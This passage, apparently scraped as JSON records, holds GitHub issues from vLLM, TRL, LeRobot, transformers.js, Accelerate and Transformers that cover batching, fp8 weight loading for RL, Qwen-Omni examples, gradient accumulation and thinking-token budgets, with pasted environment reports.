self.model.generate() 3 times with 1 input each, rather than 1 time with 3 inputs.\nError: `Assertion failed: !_current_out (src/router.cpp:166)`\n\nIs it possible to achieve what I'm asking by always calling generate() per request and relying on internal batching, or is the only solution to \"collect\" the prompts with some management layer and then call a centralized generate()?\nThanks\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28489", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-11T20:51:58Z", "updated_at": "2025-11-11T20:53:47Z", "comments": 0, "user": "GenVr" }, { "repo": "huggingface/trl", "number": 4507, "title": "Can a multimodal model like Gemma be trained in the same way as a text-only model like Qwen, but with the goal of improving only its text capabilities?", "body": "As stated in the title, I hope to improve only the text capabilities of Gemma 3, but it doesn\u2019t seem to have worked as expected.
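Regarding the AsyncLLMEngine question in vllm-project/vllm#28489 above: as far as I can tell, the intended usage is one generate() call per request, each with its own unique request_id, issued concurrently on the same event loop; the engine then batches across all in-flight requests. A minimal sketch under those assumptions, reusing the reporter's engine and sampling_params objects (the uuid-based ids are an illustrative choice):

```python
import asyncio
import uuid

async def run_one(engine, prompt, sampling_params) -> str:
    # One generate() call per request; concurrent calls must not share
    # a request_id.
    final = None
    async for out in engine.generate(prompt, sampling_params, str(uuid.uuid4())):
        final = out
    return final.outputs[0].text

async def run_many(engine, prompts, sampling_params) -> list[str]:
    # Launching the calls concurrently (rather than awaiting them one by
    # one) is what lets the scheduler batch them together.
    return await asyncio.gather(
        *(run_one(engine, p, sampling_params) for p in prompts)
    )
```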
The model I used is gemma-3-4b-it, and I conducted the following simple tests:\n```python\n dataset = Dataset.from_list(\n [\n {\"prompt\": \"What is 2+2?\", \"task\": \"math\"},\n {\"prompt\": \"Write a function that returns the sum of two numbers.\", \"task\": \"code\"},\n {\"prompt\": \"What is 3*4?\", \"task\": \"math\"},\n {\"prompt\": \"Write a function that returns the product of two numbers.\", \"task\": \"code\"},\n ]\n )\n```\nThis data shouldn\u2019t cause Gemma to generate excessively long responses, but according to the logs, its output length is quite large: ```'completions/mean_length': 4096.0, 'completions/min_length': 4096.0, 'completions/max_length': 4096```\nThis doesn\u2019t seem normal.\n", "url": "https://github.com/huggingface/trl/issues/4507", "state": "open", "labels": [ "\ud83d\udc1b bug", "\u23f3 needs more info" ], "created_at": "2025-11-11T15:59:51Z", "updated_at": "2025-11-21T05:58:50Z", "comments": 0, "user": "Tuziking" }, { "repo": "vllm-project/vllm", "number": 28472, "title": "[Usage]: Will the reasoning_content in the chat template still be applied correctly after switching reasoning_content to reasoning", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nWill message.reasoning_content (which exists in the default chat_template for qwen3-next-thinking, qwen3-vl-thinking and other qwen3-thinking series models, as well as glm4.5, kimi-k2-thinking and others) still be applied correctly in the chat template after changing reasoning_content to reasoning (i.e., mapping the reasoning field of the AI message onto reasoning_content in the chat template)?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28472", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-11T15:04:11Z", "updated_at": "2025-11-13T06:25:29Z", "comments": 4, "user": "zhcn000000" }, { "repo": "vllm-project/vllm", "number": 28456, "title": "[Usage]: benchmark_moe Usage", "body": "### Your current environment\n\n```text\n(EngineCore_DP0 pid=7498) INFO 11-10 11:42:48 [shm_broadcast.py:466] No available shared memory broadcast block found in 60 seconds. This typically happens when some processes are hanging or doing some time-consuming work (e.g.
compilation).\n(APIServer pid=7416) INFO 11-10 11:42:50 [loggers.py:127] Engine 000: Avg prompt throughput: 104162.6 tokens/s, Avg generation throughput: 10.0 tokens/s, Running: 100 reqs, Waiting: 0 reqs, GPU KV cache usage: 10.1%, Prefix cache hit rate: 98.6%\n(APIServer pid=7416) INFO 11-10 11:43:00 [loggers.py:127] Engine 000: Avg prompt throughput: 0.0 tokens/s, Avg generation throughput: 0.0 tokens/s, Running: 100 reqs, Waiting: 0 reqs, GPU KV cache usage: 10.1%, Prefix cache hit rate: 98.6%\n(APIServer pid=7416) INFO 11-10 11:43:20 [loggers.py:127] Engine 000: Avg prompt throughput: 5.1 tokens/s, Avg generation throughput: 0.1 tokens/s, Running: 1 reqs, Waiting: 0 reqs, GPU KV cache usage: 0.1%, Prefix cache hit rate: 98.6%\n\n\n\n\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.28.3\nLibc version : glibc-2.39\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-85-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration :\nGPU 0: Tesla V100-PCIE-16GB\nGPU 1: Tesla V100-PCIE-16GB\n\nNvidia driver version : 570.195.03\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 43 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 24\nOn-line CPU(s) list: 0-23\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 7402P 24-Core Processor\nCPU family: 23\nModel: 49\nThread(s) per core: 1\nCore(s) per socket: 24\nSocket(s): 1\nStepping: 0\nFrequency boost: disabled\nCPU(s) scaling MHz: 74%\nCPU max MHz: 2800.0000\nCPU min MHz: 1500.0000\nBogoMIPS: 5599.64\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate ssbd mba ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total
cqm_mbm_local clzero irperf xsaveerptr rdpru wbnoinvd arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic v_vmsave_vmload vgif v_spec_ctrl umip rdpid overflow_recov succor smca sev sev_es\nVirtualization: AMD-V\nL1d cache: 768 KiB (24 instances)\nL1i cache: 768 KiB (24 instances)\nL2 cache: 12 MiB (24 instances)\nL3 cache: 1", "url": "https://github.com/vllm-project/vllm/issues/28456", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-11T09:22:33Z", "updated_at": "2025-11-21T01:43:41Z", "comments": 6, "user": "ekmekovski" }, { "repo": "huggingface/lerobot", "number": 2422, "title": "Running inference on Libero with pi0", "body": "Hello, I am trying to run inference with pi0 but the commands referenced in this issue #683 are outdated I believe. What would the commands be to run inference in Lerobot, and also running inference with pi0 in Libero? Additionally, if there is any documentation for these commands in general for fine-tuning and eval, that would be great!", "url": "https://github.com/huggingface/lerobot/issues/2422", "state": "open", "labels": [ "question", "policies", "evaluation" ], "created_at": "2025-11-11T09:22:25Z", "updated_at": "2025-11-19T16:53:27Z", "user": "thomasdeng2027" }, { "repo": "huggingface/lerobot", "number": 2421, "title": "Seeking assistance with tactile data acquisition", "body": "I want to simultaneously collect tactile and visual data, with tactile data sampled at 150 fps and visual data at 30 fps. Each time an image frame is saved, I also want to store all tactile data collected during that time interval as additional features associated with the image.\n\nWhat would be the best approach to implement this? Which parts of the source code should I modify?", "url": "https://github.com/huggingface/lerobot/issues/2421", "state": "open", "labels": [ "question" ], "created_at": "2025-11-11T02:49:57Z", "updated_at": "2025-11-19T16:53:05Z", "user": "zhoushaoxiang" }, { "repo": "vllm-project/vllm", "number": 28438, "title": "[Usage]: How do I install vLLM nightly?", "body": "### Your current environment\n\nThe output of collect_env.py\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 20.04.5 LTS (x86_64)\nGCC version : (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0\nClang version : Could not collect\nCMake version : version 3.16.3\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.5.1+cu121\nIs debug build : False\nCUDA used to build PyTorch : 12.1\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.18 (main, Jun 5 2025, 13:14:17) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.4.250-2-velinux1u1-amd64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.4.131\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA A100-SXM4-80GB\nGPU 1: NVIDIA A100-SXM4-80GB\nGPU 2: NVIDIA A100-SXM4-80GB\nGPU 3: NVIDIA A100-SXM4-80GB\nGPU 4: NVIDIA A100-SXM4-80GB\nGPU 5: NVIDIA A100-SXM4-80GB\nGPU 6: NVIDIA A100-SXM4-80GB\nGPU 7: NVIDIA A100-SXM4-80GB\n\nNvidia driver version : 535.129.03\ncuDNN version : Probably one of the 
following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_train.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_train.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_train.so.8.7.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nByte Order: Little Endian\nAddress sizes: 46 bits physical, 57 bits virtual\nCPU(s): 112\nOn-line CPU(s) list: 0-108\nOff-line CPU(s) list: 109-111\nThread(s) per core: 1\nCore(s) per socket: 28\nSocket(s): 2\nNUMA node(s): 2\nVendor ID: GenuineIntel\nCPU family: 6\nModel: 106\nModel name: Intel(R) Xeon(R) Platinum 8336C CPU @ 2.30GHz\nStepping: 6\nCPU MHz: 2294.608\nBogoMIPS: 4589.21\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 1.3 MiB\nL1i cache: 896 KiB\nL2 cache: 35 MiB\nL3 cache: 54 MiB\nNUMA node0 CPU(s): 0-55\nNUMA node1 CPU(s): 56-111\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced IBRS, IBPB conditional, RSB filling, PBRSB-eIBRS SW sequence\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves wbnoinvd arat avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq av", "url": "https://github.com/vllm-project/vllm/issues/28438", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-11T02:24:47Z", "updated_at": "2025-11-12T01:54:42Z", "comments": 2, "user": "LittleLucifer1" }, { "repo": "vllm-project/vllm", "number": 28425, "title": "[Feature][RL]: Fix Fp8 Weight Loading for RL", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nFeedback from RL community that vLLM weight loading in fp8 is bad for RL\n- https://vllm-dev.slack.com/archives/C07UUL8E61Z/p1762811441757529\n\nThe cause is clear: in 
[fp8.py](https://github.com/vllm-project/vllm/blob/bf6a3d0ff5a69e0a30567f2ad417530c002eaa4e/vllm/model_executor/layers/quantization/fp8.py#L490) in process_weights_after_loading there is a lot of parameter wrapping that drops the .weight_loader attribute. \n\nThere's a patch from the Moonshot team that fixes this issue, and there's a [PR](https://github.com/vllm-project/vllm/pull/24488) with this patch that never got any comments. The [patch](https://github.com/MoonshotAI/checkpoint-engine/blob/main/patches/vllm_fp8.patch) only works on top of v0.10.2rc1. Shortly after that tag, this [PR](https://github.com/vllm-project/vllm/pull/23280) made fp8 weight updates even trickier by transposing the weight_inv_scale parameter for CUTLASS. \n\nI don't know how to patch any vLLM version after this PR to be able to call model.load_weights after the engine has started. It is a bummer, because DeepSeek wide-EP inference is quite a bit faster in v0.11.0.\n\nWe need to fix this ASAP.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28425", "state": "open", "labels": [ "feature request" ], "created_at": "2025-11-10T21:59:02Z", "updated_at": "2025-11-10T23:25:37Z", "comments": 1, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/transformers.js", "number": 1450, "title": "SmolVLM2 500M Video Instruct - Video inference", "body": "### Question\n\nHey, is it possible to set up **video** inference through **transformers.js** (or maybe some other way?) for the model SmolVLM2 500M Video Instruct? I can't make it work, but I saw that it is possible in Python transformers.\n\nI want to create something similar to https://huggingface.co/spaces/HuggingFaceTB/SmolVLM2-HighlightGenerator/tree/main but with full local WebGPU inference.\n\nThanks in advance.
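Until native video input is available, a common workaround for VLMs is to sample a handful of frames and pass them as a sequence of images; in the browser this means drawing video frames onto a canvas, and the Python analogue looks roughly like the sketch below. This helper is generic and assumes opencv-python plus Pillow; it is not transformers.js API.

```python
import cv2  # assumes opencv-python is installed
from PIL import Image

def sample_frames(video_path: str, num_frames: int = 8) -> list[Image.Image]:
    """Uniformly sample frames so a video can be fed to an image-capable VLM."""
    cap = cv2.VideoCapture(video_path)
    total = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
    frames: list[Image.Image] = []
    for i in range(num_frames):
        # Seek to evenly spaced positions across the clip.
        cap.set(cv2.CAP_PROP_POS_FRAMES, int(i * total / max(num_frames, 1)))
        ok, frame = cap.read()
        if not ok:
            break
        # OpenCV decodes BGR; PIL expects RGB.
        frames.append(Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)))
    cap.release()
    return frames
```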
cc: @xenova ", "url": "https://github.com/huggingface/transformers.js/issues/1450", "state": "open", "labels": [ "question" ], "created_at": "2025-11-10T19:51:07Z", "updated_at": "2025-11-12T07:46:32Z", "user": "youchi1" }, { "repo": "vllm-project/vllm", "number": 28409, "title": "[Usage]: Is there any performance benchmark between running the vLLM server via the Docker image and via Python?", "body": "### Your current environment\n\n```text\n\nI mean, if I run a service with the vLLM Docker image, does it have any performance advantage compared with running it as a Python service (e.g., importing the vllm package, setting up vllm inference, handling payload/responses, etc.)?\n\n```\n\n\n### How would you like to use vllm\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28409", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-10T17:56:14Z", "updated_at": "2025-11-10T17:56:14Z", "comments": 0, "user": "rafaelsandroni" }, { "repo": "vllm-project/vllm", "number": 28393, "title": "[Feature]: Does vllm-jax plan to support GPU acceleration?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nDoes vllm-jax plan to support GPU acceleration?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28393", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-11-10T12:28:20Z", "updated_at": "2025-11-10T21:44:57Z", "comments": 2, "user": "south-ocean" }, { "repo": "vllm-project/vllm", "number": 28388, "title": "[Bug]: The new vLLM has deprecated the V0 code, while support for the Qwen-Omni model series is limited to V0; apparently for this reason, we cannot run Qwen-Omni models with the latest vLLM", "body": "### Your current environment\n\nName: vllm\nVersion: 0.10.2\n\n### \ud83d\udc1b Describe the bug\n\nThe official sample code below does not seem to run; it raises an error for the audio parameter\n\"mm_processor_kwargs\": {\n \"use_audio_in_video\": True,\n },\nused in it:\n```python\n# SPDX-License-Identifier: Apache-2.0\n# SPDX-FileCopyrightText: Copyright contributors to the vLLM project\n\"\"\"\nThis example shows how to use vLLM for running offline inference\nwith the correct prompt format on Qwen2.5-Omni (thinker only).\n\"\"\"\n\nfrom typing import NamedTuple\n\nimport vllm.envs as envs\nfrom vllm import LLM, SamplingParams\nfrom vllm.assets.audio import AudioAsset\nfrom vllm.assets.image import ImageAsset\nfrom vllm.assets.video import VideoAsset\nfrom vllm.multimodal.image import convert_image_mode\nfrom vllm.utils import FlexibleArgumentParser\n\n\nclass QueryResult(NamedTuple):\n inputs: dict\n limit_mm_per_prompt: dict[str, int]\n\n\n# NOTE: The default `max_num_seqs` and `max_model_len` may result in
OOM on\n# lower-end GPUs.\n# Unless specified, these settings have been tested to work on a single L4.\n\ndefault_system = (\n \"You are Qwen, a virtual human developed by the Qwen Team, Alibaba \"\n \"Group, capable of perceiving auditory and visual inputs, as well as \"\n \"generating text and speech.\"\n)\n\n\ndef get_mixed_modalities_query() -> QueryResult:\n question = (\n \"What is recited in the audio? \"\n \"What is the content of this image? Why is this video funny?\"\n )\n prompt = (\n f\"<|im_start|>system\\n{default_system}<|im_end|>\\n\"\n \"<|im_start|>user\\n<|audio_bos|><|AUDIO|><|audio_eos|>\"\n \"<|vision_bos|><|IMAGE|><|vision_eos|>\"\n \"<|vision_bos|><|VIDEO|><|vision_eos|>\"\n f\"{question}<|im_end|>\\n\"\n f\"<|im_start|>assistant\\n\"\n )\n return QueryResult(\n inputs={\n \"prompt\": prompt,\n \"multi_modal_data\": {\n \"audio\": AudioAsset(\"mary_had_lamb\").audio_and_sample_rate,\n \"image\": convert_image_mode(\n ImageAsset(\"cherry_blossom\").pil_image, \"RGB\"\n ),\n \"video\": VideoAsset(name=\"baby_reading\", num_frames=16).np_ndarrays,\n },\n },\n limit_mm_per_prompt={\"audio\": 1, \"image\": 1, \"video\": 1},\n )\n\n\ndef get_use_audio_in_video_query() -> QueryResult:\n question = (\n \"Describe the content of the video, then convert what the baby say into text.\"\n )\n prompt = (\n f\"<|im_start|>system\\n{default_system}<|im_end|>\\n\"\n \"<|im_start|>user\\n<|vision_bos|><|VIDEO|><|vision_eos|>\"\n f\"{question}<|im_end|>\\n\"\n f\"<|im_start|>assistant\\n\"\n )\n asset = VideoAsset(name=\"baby_reading\", num_frames=16)\n audio = asset.get_audio(sampling_rate=16000)\n assert not envs.VLLM_USE_V1, (\n \"V1 does not support use_audio_in_video. \"\n \"Please launch this example with \"\n \"`VLLM_USE_V1=0`.\"\n )\n return QueryResult(\n inputs={\n \"prompt\": prompt,\n \"multi_modal_data\": {\n \"video\": asset.np_ndarrays,\n \"audio\": audio,\n },\n \"mm_processor_kwargs\": {\n \"use_audio_in_video\": True,\n },\n },\n limit_mm_per_prompt={\"audio\": 1, \"video\": 1},\n )\n\n\ndef get_multi_audios_query() -> QueryResult:\n question = \"Are these two audio clips the same?\"\n prompt = (\n f\"<|im_start|>system\\n{default_system}<|im_end|>\\n\"\n \"<|im_start|>user\\n<|audio_bos|><|AUDIO|><|audio_eos|>\"\n \"<|audio_bos|><|AUDIO|><|audio_eos|>\"\n f\"{question}<|im_end|>\\n\"\n f\"<|im_start|>assistant\\n\"\n )\n return QueryResult(\n inputs={\n \"prompt\": prompt,\n \"multi_modal_data\": {\n \"audio\": [\n AudioAsset(\"winning_call\").audio_and_sample_rate,\n AudioAsset(\"mary_had_lamb\").audio_and_sample_rate,\n ],\n },\n },\n limit_mm_per_prompt={\n \"audio\": 2,\n },\n )\n\n\nquery_map = {\n \"mixed_modalities\": get_mixed_modalities_query,\n \"use_audio_in_video\": get_use_audio_in_video_query,\n \"multi_audios\": get_multi_audios_query,\n}\n\n\ndef main(args):\n model_name = \"Qwen/Qwen2.5-Omni-7B\"\n query_result = query_map[args.query_type]()\n\n llm = LLM(\n model=model_name,\n max_model_len=5632,\n max_num_seqs=5,\n limit_mm_per_prompt=query_result.limit_mm_per_prompt,\n seed=args.seed,\n )\n\n # We set temperature to 0.2 so that outputs can be different\n # even when all prompts are identical when running batch inference.\n sampling_params = SamplingParams(temperature=0.2, max_tokens=64)\n\n outputs = llm.generate(query_result.inputs, sampling_params=sampling_params)\n\n for o in outputs:\n generated_text = o.outputs[0].text\n print(generated_text)\n\n\ndef parse_args():\n parser = FlexibleArgumentParser(\n description=\"Demo on using vLLM for 
offline inference with \"\n \"audio language models\"\n )\n ", "url": "https://github.com/vllm-project/vllm/issues/28388", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-10T09:23:33Z", "updated_at": "2025-11-16T05:51:42Z", "comments": 1, "user": "Lee-xeo" }, { "repo": "huggingface/accelerate", "number": 3836, "title": "When using gradient accumulation, does the order of optimizer.zero_grad() affect training?", "body": "If I use accelerate+deepspeed to train a model, and I set\n```yaml\ndeepspeed_config:\n gradient_accumulation_steps: 8\n offload_optimizer_device: cpu\n offload_param_device: cpu\n zero3_init_flag: false\n zero_stage: 2\n```\n\ndoes the order of backward(), step(), zero_grad() affect training?\nFor example:\n```python\nfor batch in training_dataloader:\n with accelerator.accumulate(model):\n inputs, targets = batch\n outputs = model(inputs)\n loss = loss_function(outputs, targets)\n accelerator.backward(loss)\n optimizer.step()\n scheduler.step()\n optimizer.zero_grad()\n```\n\nand\n```python\nfor batch in training_dataloader:\n with accelerator.accumulate(model):\n optimizer.zero_grad()\n inputs, targets = batch\n outputs = model(inputs)\n loss = loss_function(outputs, targets)\n accelerator.backward(loss)\n optimizer.step()\n scheduler.step()\n```\n\nI want to know whether the two situations will yield the same result. During gradient-accumulation training, when the model needs to update the parameters and `accelerator.sync_gradients=True`, will the second method clear the accumulated gradients, making the gradient accumulation incorrect, so that at that point there is effectively only one sample?", "url": "https://github.com/huggingface/accelerate/issues/3836", "state": "closed", "labels": [], "created_at": "2025-11-10T03:11:21Z", "updated_at": "2025-12-20T15:24:00Z", "comments": 3, "user": "polestarss" }, { "repo": "huggingface/transformers", "number": 42113, "title": "Add AutoMergeAdapters: Official Utility to Combine Multiple LoRA Adapters into One Unified Model", "body": "### Feature request\n\nIntroduce a new built-in class AutoMergeAdapters to the Transformers/PEFT ecosystem that enables users to merge multiple LoRA adapters trained on different domains or datasets into a single model.\n\nThis feature simplifies the process of creating multi-domain fine-tuned models for inference and deployment, without manual merging scripts.\n\n### Motivation\n\nToday, users can fine-tune models with LoRA adapters easily using PEFT, but they face a major bottleneck when trying to combine more than one adapter.\n\nCurrent limitations:\n\nOnly one LoRA adapter can be merged using merge_and_unload()\n\nManual merges are error-prone and undocumented\n\nModel config alignment must be handled manually\n\nNo built-in CLI or user-friendly API for adapter composition\n\nA high-level API for multi-adapter merging would:\n\nPromote adapter reusability across domains\n\nSimplify deployment of multi-domain, multi-skill models\n\nReduce code duplication across community projects\n\n### Your contribution\n\nI would like to implement this feature and contribute the following:\n\nDevelop the AutoMergeAdapters class under src/transformers/adapters/auto_merge_adapters.py to support merging multiple LoRA adapters with optional weighted combination and compatibility validation.\n\nExtend transformers-cli by adding a new merge-adapters command for CLI-based merging and model export.\n\nAdd unit and integration tests in tests/adapters/test_auto_merge_adapters.py to ensure correctness for weighted merges, config mismatches,
and adapter integrity.\n\nProvide documentation including a usage guide and a sample notebook under examples/adapters/merge_multiple_adapters.ipynb.\n\nPublish a demo merged model to the Hugging Face Hub for reproducibility and reference.\n\nOpen a clean, well-tested PR and iterate based on maintainer feedback.\n\nHappy to start implementation once the approach is approved. Looking forward to guidance if any adjustments are required.", "url": "https://github.com/huggingface/transformers/issues/42113", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-11-09T18:43:20Z", "updated_at": "2025-11-10T16:58:34Z", "comments": 1, "user": "3015pavan" }, { "repo": "huggingface/transformers", "number": 42111, "title": "Add thinking-budget support (max_thinking_tokens) for reasoning-capable chat models", "body": "### Feature request\n\nA built-in way to cap how many tokens a reasoning model spends inside its ``<think>`` \u2026 ``</think>`` block. Today, we can only control the total response length via ``max_new_tokens``. No parameter limits the internal reasoning segment when ``enable_thinking=True``.\n\n### Motivation\n\n- Reasoning models (e.g., Qwen3 series) often produce very long thought blocks, which can blow past latency budgets before the final answer starts.\n- Users need a simple, model-agnostic control to bound that \u201cthinking\u201d cost without disabling reasoning entirely.\n- The Qwen docs (https://qwen.readthedocs.io/en/latest/getting_started/quickstart.html#thinking-budget) already describe a brute-force approach (two-step generation) to implement \u201cthinking budgets\u201d.\n\n### Your contribution\n\nI want to submit a PR that:\n\n- Extends ``GenerationConfig`` with:\n``max_thinking_tokens``: integer budget for reasoning tokens.\n``begin_thinking_token_id / end_thinking_token_id``: marker IDs so generation knows where the thinking span begins/ends.\n- Adds a ``MaxThinkingTokensLogitsProcessor`` that watches the active ``<think>`` block. Once the budget is reached, it forces ``end_thinking_token_id``, ensuring the model exits reasoning and continues with the final response.\n- Documents the new parameter in reasoning-model guides (EXAONE, CWM, etc.) and shows how to wire the thinking-token IDs until configs do it automatically.\n- Provides unit coverage so ``_get_logits_processor`` injects the new processor whenever the config is fully specified.", "url": "https://github.com/huggingface/transformers/issues/42111", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-11-09T10:09:11Z", "updated_at": "2025-11-09T10:09:11Z", "comments": 0, "user": "AndresAlgaba" }, { "repo": "vllm-project/vllm", "number": 28362, "title": "[Usage]: Can't get vLLM to run on an Intel 125H with XPU and Arc graphics", "body": "### Your current environment\n\n```text\n\nCollecting environment information...
